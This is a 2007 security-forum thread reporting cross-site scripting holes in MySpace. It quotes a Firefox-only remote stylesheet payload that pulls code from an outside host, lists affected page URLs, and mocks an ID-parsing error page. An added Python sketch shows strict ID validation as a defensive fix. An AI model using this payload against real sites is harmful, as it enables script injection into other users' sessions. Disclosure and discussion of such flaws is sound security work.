Sla.ckers.org
More myspace
Posted by: tx
Date: March 23, 2007 03:31AM

There are a couple areas vulnerable to the Remote style sheet part 4 vector on the cheat sheet : <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> .

Namely the Body of any ads posted in the classified section (sorry, no link). I also was able to get an alert in the blog section: http://blog.myspace.com/index.cfm?fuseaction=blog.view&friendID=171414541&blogID=244568582&MyToken= <-FF only
There may be more, but I haven't looked for them.

On a semi-related note, check out this error page: http://blog.myspace.com/blog/rss.cfm?friendID=x
I don't think it's useful/exploitable, but it's definitely weird.

-tx @ lowtech-labs.org

Re: More myspace
Posted by: rsnake
Date: March 23, 2007 11:50AM

Very cool! That's not a super common one. And that is a really odd bug you found there. It actually gives some insight into how the site was built.

- RSnake
Gotta love it. http://ha.ckers.org

Re: More myspace
Posted by: trev
Date: March 23, 2007 10:07PM

We know how this site was built - with much hard work from underpaid and underqualified developers :)

That's really the entire template printed in plain text - nice find tx!

PS: "Parameter must be a double" - WTF??? Are they really using floating point numbers to identify users? Edit2: They really are that crazy: http://blog.myspace.com/blog/rss.cfm?friendID=1233123.4E1
Edit3: And then they convert these floating point numbers to int64, see error message on http://blog.myspace.com/blog/rss.cfm?friendID=1233123.4E256

Edited 3 time(s). Last edit at 03/23/2007 10:16PM by trev.

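As an added illustration of the point trev makes above (not code from the thread or from MySpace), here is a Python sketch contrasting an ID parameter that is accepted as a double and then narrowed to int64 with one that is validated as a plain decimal integer. Both functions and the int64 narrowing are assumptions made for the example; the security-relevant point is that the double path accepts several spellings of the same ID ("12331234", "1233123.4E1", "1.2331234E7"), which defeats any string-based allow list, rate limit or log search keyed on the raw parameter.

```python
import re
from typing import Optional

INT64_MAX = 2**63 - 1
# Canonical form only: no sign, no leading zeros, no fraction, no exponent.
_CANONICAL_ID = re.compile(r"^(0|[1-9][0-9]{0,18})$")


def friend_id_as_double(raw: str) -> Optional[int]:
    """Assumed behaviour: parse as a double, then narrow to int64.

    Returns None where the original would raise ("Parameter must be a
    double", or the later double-to-int64 conversion failing).
    """
    try:
        value = float(raw)
    except ValueError:
        return None  # not a double at all
    # NaN, +/-inf and fractional values cannot become a whole int64;
    # huge exponents (e.g. 4E256) exceed the int64 range.
    if not value.is_integer() or value < 0 or value > INT64_MAX:
        return None
    return int(value)


def friend_id_as_integer(raw: str) -> Optional[int]:
    """Strict validation: exactly one canonical spelling per ID."""
    if not _CANONICAL_ID.fullmatch(raw):
        return None
    value = int(raw)
    return value if value <= INT64_MAX else None


def aliases_accepted(spellings: list[str]) -> dict[str, list[str]]:
    """Group raw spellings by the ID the double path resolves them to.

    Any group with more than one entry is an alias set: distinct request
    strings that the application treats as the same user.
    """
    groups: dict[str, list[str]] = {}
    for raw in spellings:
        resolved = friend_id_as_double(raw)
        if resolved is not None:
            groups.setdefault(str(resolved), []).append(raw)
    return groups
```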
Re: More myspace
Posted by: tx
Date: March 23, 2007 11:42PM

Well you know, a lot of the users are underage, and you can't expect them to be represented with a whole userid... a 13 year old is really like 0.75 of a user.

-tx @ lowtech-labs.org

Re: More myspace
Posted by: rsnake
Date: March 24, 2007 12:53AM

haha :)

- RSnake
Gotta love it. http://ha.ckers.org
